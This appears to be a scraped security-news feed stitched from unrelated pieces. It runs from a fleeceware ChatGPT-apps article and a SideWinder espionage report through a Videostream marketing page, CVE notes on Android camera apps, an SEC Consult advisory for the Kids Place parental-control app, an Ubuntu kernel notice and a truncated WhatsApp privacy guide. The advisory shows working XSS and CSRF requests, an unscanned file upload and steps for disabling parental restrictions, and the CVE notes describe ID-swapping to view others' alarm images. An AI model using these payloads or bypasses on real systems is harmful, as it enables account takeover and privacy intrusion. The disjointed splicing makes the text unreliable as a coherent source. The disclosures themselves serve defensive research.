An explosion of interest in OpenAI’s sophisticated chatbot means a proliferation of “fleeceware” apps that trick users with sneaky in-app subscriptions.

Any major trend or world event, from the coronavirus pandemic to the cryptocurrency frenzy, will quickly be used as fodder in digital phishing attacks and other online scams. In recent months, it has become clear that the same would happen for large language models and generative AI. Today, researchers from the security firm Sophos are warning that the latest incarnation of this is showing up in Google Play and Apple’s App Store, where scammy apps are pretending to offer access to OpenAI’s chatbot service ChatGPT through free trials that eventually start charging subscription fees.

There are paid versions of OpenAI’s GPT and ChatGPT for regular users and developers, but anyone can try the AI chatbot for free on the company’s website. The scam apps take advantage of people who have heard about this new technology—and perhaps the frenzy of people clamoring to use it—but don’t have much additional context for how to try it themselves. The researchers first learned about the scam apps after seeing ads for them in news apps and on social networks, but users may also encounter them by searching in Google Play and the App Store.

“I saw multiple ads for these types of apps on social media platforms where it’s cheap to advertise, and sometimes they use tactics like typos in the name—calling the app ‘Chat GBT’ or others—to screen out people who might be a bit more savvy,” says Sean Gallagher, a senior threat researcher at Sophos. “They’re trying to screen out people who would do the free trial and then cancel it because it’s crap. They want the people who are not focused enough to know how to unsubscribe.”

Such scams are known as fleeceware. And these apps, which hook victims into paying a regular weekly or monthly fee, are difficult to stamp out, because they typically don't exhibit the technically invasive and malicious behavior that would get more explicit malware booted. When scammers submit their apps to Apple and Google for review, the researchers note, they may not include all of the details on the subscription pricing and when users will have to pay to continue receiving functionality. Later, they can revise their demands without changing anything about how the app is engineered.

Google and Apple provide mechanisms for developers to offer in-app purchases, both one-time fees and recurring charges. And these companies get a cut every time apps in their app stores collect payments from users.

In the case of the Android app Open Chat GBT, users could download the app for free but were quickly confronted with huge quantities of ads and could try the chatbot only three times before losing access to its functionality and receiving a prompt to subscribe. By default, users could sign up for a three-day free trial to continue using the app, which would then become a monthly $10 subscription. Open Chat GBT also offered a $30 annual subscription. The researchers found a very similar app with a different name by the same developer for iOS in the App Store.

The Sophos researchers note that Apple and Google took down some of the fake AI chatbot apps they were looking at before disclosure. There were others, though, that remained available after the researchers flagged them to Google and Apple. Both companies acknowledged receipt of the submissions, and Google took down one more app. Google and Apple did not immediately respond to requests for comment about the findings.

The researchers say they suspect that some of the apps use OpenAI’s ChatGPT 3 application programming interface to generate content for users while others use lower-quality chatbot functionalities. And instead of limiting the user to a small number of queries, some of the apps would truncate responses and give users only a snippet until they started a subscription.

Gallagher says that one of the biggest problems with fleeceware is that users don't always know how to manage their subscriptions and don't realize that even when they delete an app, their recurring payments will continue to be active with the service.

“We define fleeceware as something that charges an extraordinary amount of money for a feature that is available freely or at very low cost elsewhere,” he says. “And it’s effective, because even I sometimes wonder, why am I getting charged this much by Apple every month? And it's like, OK, there’s the shared family storage, there's AppleCare for my phone, there’s Duolingo. You have to be very careful—you have to actively manage subscriptions to apps.”

ChatGPT Scams Are Infiltrating Apple's App Store and Google Play

Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to strike entities located in Pakistan and China.
This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News.
"The identified phishing

Cyber Espionage / Threat Intel

Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group **SideWinder** to strike entities located in Pakistan and China.

This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News.

"The identified phishing domains mimic various organizations in the news, government, telecommunications, and financial sectors," researchers Nikita Rostovtsev, Joshua Penny, and Yashraj Solanki said.

SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as an intrusion mechanism to obtain a foothold into targeted environments.

The target range of the group is widely believed to be associated with Indian espionage interests. The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore.

Earlier this February, Group-IB brought to light evidence that SideWinder may have targeted 61 government, military, law enforcement, and other organizations across Asia between June and November 2021.

More recently, the nation-state group was observed leveraging a technique known as server-based polymorphism in evasive attacks targeting Pakistani government organizations.

The newly discovered domains mimic government organizations in Pakistan, China, and India and are characterized by the use of the same values in WHOIS records and similar registration information.

Hosted on some of these domains are government-themed lure documents that are designed to download an unknown next-stage payload.

A majority of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One among them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which was analyzed by both QiAnXin and BlackBerry in recent months.

Also uncovered is a Windows shortcut (LNK) file that was uploaded to VirusTotal from Beijing in late November 2022. The LNK file, for its part, is engineered to run an HTML application (HTA) file retrieved from a remote server that spoofs Tsinghua University's email system (mailtsinghua.sinacn\[.\]co).

Another LNK file that was uploaded to VirusTotal around the same time from Kathmandu employs a similar method to fetch an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov\[.\]org).

Further investigation into SideWinder's infrastructure has led to the discovery of a malicious Android APK file (226617) that was uploaded to VirusTotal from Sri Lanka in March 2023.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The rogue Android app passes off as a "Ludo Game" and prompts users to grant it access to contacts, location, phone logs, SMS messages, and calendar, effectively functioning as spyware capable of harvesting sensitive information.

Group-IB said the app also exhibits similarities with the fake Secure VPN app the company disclosed in June 2022 as being distributed to targets in Pakistan by means of a traffic direction system (TDS) called AntiBot.

In all, the domains point to SideWinder setting its sights on financial, government, and law enforcement organizations, as well as companies specializing in e-commerce and mass media in Pakistan and China.

"Like many other APT groups, SideWinder relies on targeted spear-phishing as the initial vector," the researchers said. "It is therefore important for organizations to deploy business email protection solutions that detonate malicious content."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

 State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered

Videostream macOS app 0.5.0 and 0.4.3 has a Race Condition. The Updater privileged script attempts to update Videostream every 5 hours.

**Downloaded videos on your Chromecast. Instantly.****The easiest way to stream

videos MP4s MKVs AVIs WMVs MP3s

from your computer to Chromecast or AndroidTV.  
Control it all from Android or iOS.**

  

Brooklyn Nine Nine © 2013-2015 Fremulon, Dr. Goor Productions (PG)

play\_arrow

No setup. Seriously.  
**Just start watching.**

event\_seat

**Relax with Mobile Apps**

Play, pause, & seek from your couch with **free** Android and iOS remotes.

**Play MKVs, AVIs, MP4s, MP3s...**

Videostream supports over 400 video and audio codecs out of the box.  
This means you can **play almost any video on your Chromecast!**

**...with no setup**

There's no pesky library setup or servers to install.  
There's no accounts to create or codecs to download.  
**Just choose a video and ...no really, that's it!**  
Start watching any video on your Chromecast in seconds, Install the Desktop App now!

Frozen © 2013 Walt Disney Animation Studios (G)

Suits © 2011-2015 Universal Cable (TV-14)

**Playlists, Subtitles, & Rainbows,  
Premium is Awesome.**

done

**Playlists:** Binge watch your favourite shows using playlists in Chrome

done

**Subtitles:** Get extra settings to change subtitle size and color

done

**Notifications:** Notifications on Android when your downloads finish

done

**Love:** Support (and feed!) our team of 7 developers in Canada! <3

**Start watching downloads on your Chromecast!**

**"It's the perfect app to stream your media to your Chromecasts"**

"No fiddling about with extra services, just find the file you want and have it play in the big screen." - Gizmodo

**It transformed my Chromecast from a Netflix and YouTube machine to a watch-whatever-I-want-machine. Which is great!**

\- Shonda, Videostream User

**Let me start by saying that I recently bought the lifetime premium membership and I absolutely love Videostream. It is my favorite thing in the world after pizza and Coca-Cola.**

\- Aldo, Videostream Premium User

**I have a very large movie collection on a networked drive, and it never fails to load the movies, cast them, load subtitles, etc. It's a piece of technology and media genius, so thank you all.**

\- Eliza, Videostream User

**I just wanted to say how much I love Videostream. I use it almost every day. Now that I can select files right from my phone, it is a completely hassle free experience.**

\- Rezaan, Videostream User

**People love Videostream. Try it yourself for free!  
**

**7 developers in Canada eh!?**

Just bunch of Canucks coding for the love of perfect streaming video <3

**Frequently Asked Questions**

Got questions? We have answers (if your answer isn't below, email us!)

**Do you play \_\_\_ files? (MKV, MP4, AVI, WMV...)**

Yup!! Videostream supports over 400 audio and video codecs so with almost complete certainty, yes.

**How much does it cost?**

Nothing, zip, zilch, nada, Videostream is completely free! If you're enjoying Videostream and want some extra features like playlists, extra subtitle settings, night mode, autoplay, and more, then Videostream Premium is for you!

**I have slow internet, will Videostream work?**

You bet! Since you are streaming video from your computer directly to your Chromecast or AndroidTV, Videostream doesn't use any of your internet bandwidth! That means no extra usage on your bill, no slowed down traffic on other devices.

**How do I setup Videostream?**

It's super simple! Open Google Chrome and then install Videostream. If you have an iPhone or Android phone you can check out our remote controls on those apps stores too!

**Does Videostream have playlists?!**

Is maple syrup sweet?! You bet! Playlists let you binge watch movies, tv shows, and even listen to music on your Chromecast. You can even shuffle or repeat your playlist! Grab your playlists in Videostream Premium, download and upgrade in the Desktop or Android App today!

**What if I have another question?**

Email us at \[email protected\]! Our awesome support bro Andrew will be sure to email you back with answers to your questions, solutions to your problems, and a random selection of cat pictures and gifs!

**Come on, it's what you bought your Chromecast for!**

CVE-2023-25394: What you bought your Chromecast for.

Incorrect access control in Videogo v6.8.1 allows attackers to bind shared devices after the connection has been ended.

Permalink

Cannot retrieve contributors at this time

**com.videogo 6.8.1 has Incorrect Access Control****Vulnerability Type:**

Incorrect Access Control

**Vulnerability Version:**

6.8.1

**Recurring environment**

≥Android 7.0

**Vulnerability Description AND recurrence:**

When someone shares the device, the cloud service sends the password of the device to the user  Although the device owner unshares the device, the user can still bind the device with the device number and device password

CVE-2023-31678: record/yingshi_devicekey.md at main · zzh-newlearner/record

Insecure permissions in luowice 3.5.18 allow attackers to view information for other alarm devices via modification of the eseeid parameter.

Permalink

Cannot retrieve contributors at this time

**com.generalcomp.luowice 3.5.18 has Insecure Permission****Vulnerability Type:**

Insecure Permission

**Vulnerability Version:**

3.5.18

**Recurring environment**

≥Android 7.0

**Vulnerability Description AND recurrence:**

 Modify "eseeid" to any other field and use BASE64 encoding to access alarm information for different devices  The "img\_url" in the response body is decoded by BASE64 and is the image taken in the alarm message of the device, which is not further used for ethical reasons

CVE-2023-31677: record/luowice.md at main · zzh-newlearner/record

Incorrect access control in Videogo v6.8.1 allows attackers to access images from other devices via modification of the Device Id parameter.

Permalink

**1** contributor

**Users who have contributed to this file**

**com.videogo 6.8.1 has Incorrect Access Control****Vulnerability Type:**

Incorrect Access Control

**Vulnerability Version:**

6.8.1

**Recurring environment**

≥Android 7.0

**Vulnerability Description AND recurrence:**

When obtaining alarm information, the device ID is included in the request, The picture in the response is in the Location field   After changing the device ID, you can get the image URL of the corresponding device  With this URL, you can access the alarm image without permission

CVE-2023-31679: record/yingshi_privacy.md at main · zzh-newlearner/record

Use after free in Autofill UI in Google Chrome on Android prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2722

Kiddoware Kids Place Parental Control Android App versions 3.8.49 and below suffer from weak hashing, cross site request forgery, cross site scripting, and arbitrary file upload vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230515-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Kiddoware Kids Place Parental Control Android App  
  vulnerable version: <=3.8.49  
       fixed version: 3.8.50 or higher  
          CVE number: CVE-2023-28153, CVE-2023-29078, CVE-2023-29079  
              impact: High  
            homepage: https://kiddoware.com  
               found: 2022-09-29  
                  by: Fabian Densborn (Office Vienna)  
                      Bernhard Gründling (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult.  
                      SEC Consult is part of Eviden, an atos business  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Kiddoware is the world’s leading parental control solutions company  
with a wide range of products and  serving over 5 million families  
worldwide. Kiddoware is committed in helping you to protect your kids  
while providing you intelligence to be proactive about your childs’  
online activities."

Source: https://kiddoware.com/

Business recommendation:  
------------------------  
The vendor provides an update for the affected version(s) which  
should be installed immediately.

An in-depth security analysis performed by security professionals is  
highly advised, to identify and resolve potential further critical security  
issues.

The issues identified in this application were part of our blog post  
"The hidden costs of parental control apps" published a few months ago:  
https://r.sec-consult.com/parents

Vulnerability overview/description:  
-----------------------------------  
1) Login and registration returns password as MD5 hash  
Login and registration requests return the unsalted MD5 hash  
of the password. This indicates that the passwords are stored  
in an insecure format at the server. Furthermore, MD5 hashing  
should not be used anymore in modern applications.

2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)  
The customizable name of the child's device can be used to  
trigger a XSS payload in the parent web dashboard. Children  
might be able to attack their parents' account.

3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)  
All requests in the web dashboard are vulnerable to CSRF attacks.  
The requests contain the device Id of the child device which must  
be known to the attacker in order to successfully attack a child.  
But the device Id is not considered a secret, as it is used in  
the URL in some requests. An attacker could have obtained the Id  
through the browser history.

4) Arbitrary File Upload to AWS S3 bucket  
The web dashboard lets parents send files to the child's device.  
The selected file is uploaded to an AWS S3 bucket and the returned  
URL will be transmitted to the device which will then download it.  
It is possible to send arbitrary files to the child's device and  
thereby upload arbitrary files (size restriction ~10MB) to the  
AWS S3 bucket. The returned link is publicly available, so it is  
possible to use the server to spread malware.

5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)  
The child can remove all restrictions temporarily without the parents noticing.

Proof of concept:  
-----------------  
1) Login and registration returns password as MD5 hash  
The "Change password" request looks as follows:  
--------------------------------------------------------------------------------  
POST /account/change_password/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
[...]

old_password=c869123c&new_password=password&confirm_password=password  
--------------------------------------------------------------------------------

The response from the web server contains the hashed, unsalted password:  
--------------------------------------------------------------------------------  
{  
  "error":null,  
  "result":  
    {  
      "email":"xxxxx@example.com",  
      "hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",  
      "message":"Password successfully changed!"  
    },  
  "status":200  
}  
--------------------------------------------------------------------------------

Proving this is an unsalted MD5 hash:

$ echo -n "password" | md5sum -t  
5f4dcc3b5aa765d61d8327deb882cf99  -

2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)  
The device name can be changed by the child's account by sending a POST request  
to the API with the pushDeviceConfig method. The following payload can be used as  
a PoC to trigger an alert box on every page the device name is visible in the  
parent dashboard. Children/attackers would be able to take over their parents'  
accounts via this attack.

--------------------------------------------------------------------------------  
POST /v2/api/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Content-Type: application/json; charset=utf-8  
Content-Length: 461  
Accept-Encoding: gzip, deflate  
User-Agent: okhttp/3.12.8  
Connection: close

{  
     "method":"pushDeviceConfig",  
     "id":null,  
     "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",  
     {  
         "isGPSEnabled":false,"deviceGCMRegID":"",  
         "deviceUserAgeRange":3,  
         "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",  
         [...]  
     }  
}  
--------------------------------------------------------------------------------

3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)  
As an example, an attacker can abuse the CSRF vulnerability to download an  
arbitrary file to a child's device. It is simply needed to create a form which  
automatically submits on page load. If a parent is logged in the web dashboard  
and visits this malicious site, the authenticated request will be sent and the  
file specified in the URL parameter will be downloaded by the child's device.

--------------------------------------------------------------------------------  
POST /account/push_content/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: https://kidsplace.kiddoware.com  
Content-Length: 75  
Connection: close

url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX  
--------------------------------------------------------------------------------

4) Arbitrary File Upload to AWS S3 bucket  
The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket  
and push it to the child device.  
--------------------------------------------------------------------------------  
POST /account/push_content_file/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551  
Origin: https://kidsplace.kiddoware.com  
Content-Length: 296  
[...]

-----------------------------27687116714103572458683268551  
Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"  
Content-Type: text/plain

<eicar-file>  
-----------------------------27687116714103572458683268551--  
--------------------------------------------------------------------------------

The upload of the eicar file worked without errors and could subsequently also be  
downloaded  via the returned link. So there is no antivirus scan on the uploaded files.

5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)  
The child can disable the restrictions of the application without the parents noticing.  
For this, the following steps are necessary:  
a) If Android settings are blocked, reboot into Android Safe Mode.  
b) Disable "Display over other apps" Permission for the app in Android settings.  
c) After rebooting into normal mode, the child device can be used without restrictions.

For example, previously locked apps can now be used. To notice the problem, the parent  
has to check the parent's dashboard manually, a notification is not sent. If the child  
turns the permission back on in the meantime, the bypass will go unnoticed.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and downloaded through Google Play store, which was  
the most recent version available at the time of the test:  
* 3.8.45

Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.

Vendor contact timeline:  
------------------------  
2022-11-23: Contacting vendor through kiddoware@kiddoware.com and support@kiddoware.com  
             Asking for security contact.  
2022-11-23: Response received, requesting advisory to be submitted to an employee mail.  
             No encryption demanded. Advisory sent to vendor.  
2022-11-28: Vendor informs about ongoing backend rewrites and removing some  
             upload functionalities. Some fixes will be live by Q1 2023.  
             Everything will be addressed by end of 01-04-2023.  
2022-12-15: SEC Consult informs about upcoming blog post about parental control apps.  
2022-12-15: Vendor states that most of the issues have already been fixed.  
2022-12-16: Recheck of vulnerabilities shows that not all vulnerabilities  
             have been sufficiently addressed. Vendor was informed.  
2022-12-16: Vendor explains what security measures will be implemented and  
             informs SEC Consult as soon as this is done.  
2022-12-30: Vendor informs that fixes for the found vulnerabilities have been published.  
2023-01-11: SEC Consult rechecks the vulnerabilities and found out that the applied  
             patches are not sufficient. Again, informs the vendor about it.  
2023-02-14: No response from vendor, reminder sent.  
2023-02-14: Vendor informs SEC Consult that all issues have been resolved.  
2023-03-10: Requesting CVE numbers.  
2023-03-12: Assigned CVE number for "Disable child restriction" finding.  
2023-03-31: Assigned CVE numbers for XSS and CSRF findings.  
2023-05-15: Public release of security advisory.

Solution:  
---------  
The vendor provides a patched version which should be installed immediately through Google  
Play store.  
* Version: 3.8.50 or higher

Workaround:  
-----------  
No workaround available.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an atos business  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part  
of Eviden, an atos business. It ensures the continued knowledge gain of SEC  
Consult in the field of network and application security to stay ahead of the  
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration  
testing and the evaluation of new offensive and defensive technologies for our  
customers. Hence our customers obtain the most current information about  
vulnerabilities and valid recommendation about the risk profile of new  
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF F. Densborn, B. Gründling / @2023

Kiddoware Kids Place Parental Control Android App 3.8.49 XSS / CSRF / File Upload

Ubuntu Security Notice 6080-1 - It was discovered that some AMD x86-64 processors with SMT enabled could speculatively execute instructions using a return address from a sibling thread. A local attacker could possibly use this to expose sensitive information. Zheng Wang discovered that the Intel i915 graphics driver in the Linux kernel did not properly handle certain error conditions, leading to a double-free. A local attacker could possibly use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6080-1  
May 16, 2023

linux, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15,  
linux-azure-fde, linux-azure-fde-5.15, linux-hwe-5.15, linux-ibm,  
linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oracle  
vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems  
- linux-ibm: Linux kernel for IBM cloud systems  
- linux-kvm: Linux kernel for cloud environments  
- linux-lowlatency: Linux low latency kernel  
- linux-oracle: Linux kernel for Oracle Cloud systems  
- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems  
- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems  
- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems  
- linux-hwe-5.15: Linux hardware enablement (HWE) kernel  
- linux-lowlatency-hwe-5.15: Linux low latency kernel

Details:

It was discovered that some AMD x86-64 processors with SMT enabled could  
speculatively execute instructions using a return address from a sibling  
thread. A local attacker could possibly use this to expose sensitive  
information. (CVE-2022-27672)

Zheng Wang discovered that the Intel i915 graphics driver in the Linux  
kernel did not properly handle certain error conditions, leading to a  
double-free. A local attacker could possibly use this to cause a denial of  
service (system crash). (CVE-2022-3707)

Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did  
not properly implement speculative execution barriers in usercopy functions  
in certain situations. A local attacker could use this to expose sensitive  
information (kernel memory). (CVE-2023-0459)

It was discovered that the TLS subsystem in the Linux kernel contained a  
type confusion vulnerability in some situations. A local attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-1075)

It was discovered that the Reliable Datagram Sockets (RDS) protocol  
implementation in the Linux kernel contained a type confusion vulnerability  
in some situations. An attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1078)

Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel  
did not properly initialize some data structures. A local attacker could  
use this to expose sensitive information (kernel memory). (CVE-2023-1513)

It was discovered that the Android Binder IPC subsystem in the Linux kernel  
did not properly validate inputs in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-20938)

It was discovered that a use-after-free vulnerability existed in the iSCSI  
TCP implementation in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2023-2162)

It was discovered that the NET/ROM protocol implementation in the Linux  
kernel contained a race condition in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-32269)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1030-ibm     5.15.0-1030.33  
   linux-image-5.15.0-1033-kvm     5.15.0-1033.38  
   linux-image-5.15.0-1035-oracle  5.15.0-1035.41  
   linux-image-5.15.0-1036-aws     5.15.0-1036.40  
   linux-image-5.15.0-1038-azure   5.15.0-1038.45  
   linux-image-5.15.0-1038-azure-fde  5.15.0-1038.45.1  
   linux-image-5.15.0-72-generic   5.15.0-72.79  
   linux-image-5.15.0-72-generic-64k  5.15.0-72.79  
   linux-image-5.15.0-72-generic-lpae  5.15.0-72.79  
   linux-image-5.15.0-72-lowlatency  5.15.0-72.79  
   linux-image-5.15.0-72-lowlatency-64k  5.15.0-72.79  
   linux-image-aws-lts-22.04       5.15.0.1036.35  
   linux-image-azure               5.15.0.1038.34  
   linux-image-azure-fde           5.15.0.1038.45.15  
   linux-image-azure-lts-22.04     5.15.0.1038.34  
   linux-image-generic             5.15.0.72.70  
   linux-image-generic-64k         5.15.0.72.70  
   linux-image-generic-lpae        5.15.0.72.70  
   linux-image-ibm                 5.15.0.1030.26  
   linux-image-kvm                 5.15.0.1033.29  
   linux-image-lowlatency          5.15.0.72.77  
   linux-image-lowlatency-64k      5.15.0.72.77  
   linux-image-oracle              5.15.0.1035.30  
   linux-image-virtual             5.15.0.72.70

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1036-aws     5.15.0-1036.40~20.04.1  
   linux-image-5.15.0-1038-azure   5.15.0-1038.45~20.04.1  
   linux-image-5.15.0-1038-azure-fde  5.15.0-1038.45~20.04.1.1  
   linux-image-5.15.0-72-generic   5.15.0-72.79~20.04.1  
   linux-image-5.15.0-72-generic-64k  5.15.0-72.79~20.04.1  
   linux-image-5.15.0-72-generic-lpae  5.15.0-72.79~20.04.1  
   linux-image-5.15.0-72-lowlatency  5.15.0-72.79~20.04.1  
   linux-image-5.15.0-72-lowlatency-64k  5.15.0-72.79~20.04.1  
   linux-image-aws                 5.15.0.1036.40~20.04.25  
   linux-image-azure               5.15.0.1038.45~20.04.28  
   linux-image-azure-cvm           5.15.0.1038.45~20.04.28  
   linux-image-azure-fde           5.15.0.1038.45~20.04.1.17  
   linux-image-generic-64k-hwe-20.04  5.15.0.72.79~20.04.33  
   linux-image-generic-hwe-20.04   5.15.0.72.79~20.04.33  
   linux-image-generic-lpae-hwe-20.04  5.15.0.72.79~20.04.33  
   linux-image-lowlatency-64k-hwe-20.04  5.15.0.72.79~20.04.30  
   linux-image-lowlatency-hwe-20.04  5.15.0.72.79~20.04.30  
   linux-image-oem-20.04           5.15.0.72.79~20.04.33  
   linux-image-oem-20.04b          5.15.0.72.79~20.04.33  
   linux-image-oem-20.04c          5.15.0.72.79~20.04.33  
   linux-image-oem-20.04d          5.15.0.72.79~20.04.33  
   linux-image-virtual-hwe-20.04   5.15.0.72.79~20.04.33

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6080-1  
   CVE-2022-27672, CVE-2022-3707, CVE-2023-0459, CVE-2023-1075,  
   CVE-2023-1078, CVE-2023-1118, CVE-2023-1513, CVE-2023-20938,  
   CVE-2023-2162, CVE-2023-32269

Package Information:  
   https://launchpad.net/ubuntu/+source/linux/5.15.0-72.79  
   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1036.40  
   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1038.45  
   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1038.45.1  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1030.33  
   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1033.38  
   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-72.79  
   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1035.41  
   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1036.40~20.04.1  
   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1038.45~20.04.1

 https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1038.45~20.04.1.1  
   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-72.79~20.04.1

 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-72.79~20.04.1

Ubuntu Security Notice USN-6080-1

The Meta-owned app offers end-to-end encryption of texts, images, and more by default—but its settings aren't as private as they could be.

In the summer of 2016, WhatsApp made an unprecedented change. The Meta-owned company turned on end-to-end encryption by default for all of the billion-plus people using it—becoming, in the process, the world's largest encrypted messenger. Since then, that number has topped 2 billion.

Being end-to-end encrypted by default means nobody at Meta can read, or mine data from, the content of the messages you send. All texts, photos, videos, voice messages, documents, status updates, and calls are encrypted on WhatsApp, and only the people you send them to can access them. Devices decoding encrypted content must verify and exchange security codes as messages are transferred.

The encryption that WhatsApp uses was originally developed by Open Whisper Systems, the group behind the encrypted messaging app rival Signal. In recent years, WhatsApp has introduced additional privacy and security features you can turn on. But even though WhatsApp’s end-to-end encryption does protect your communications, that doesn’t mean the service is as private as it could be by default. In fact, when it comes to WhatsApp versus Signal, we recommend the latter for people wanting the maximum security and privacy options.

However, with more than a third of the world using WhatsApp, its popularity is unrivaled, and you may not be able to drag all of your friends, family, and groups across to Signal. If that milestone is still some way off, here are some tips to make WhatsApp as private as possible.

_Updated May 2023: WhatsApp has introduced new privacy features since this story was first published in 2020. These changes are reflected below._

Understand What Data WhatsApp Collects

WhatsApp can collect a lot more information about you than you might think. Much of what it collects is similar to many other apps and can be found in its privacy policies. There are separate privacy policies for the US, Europe, and the UK. There are some differences in what WhatsApp collects, based on Europe’s privacy rules. But the app is also part of Meta’s machine, which also includes Facebook and Instagram, and some information is shared with the parent company. The association alone can put people off using WhatsApp.

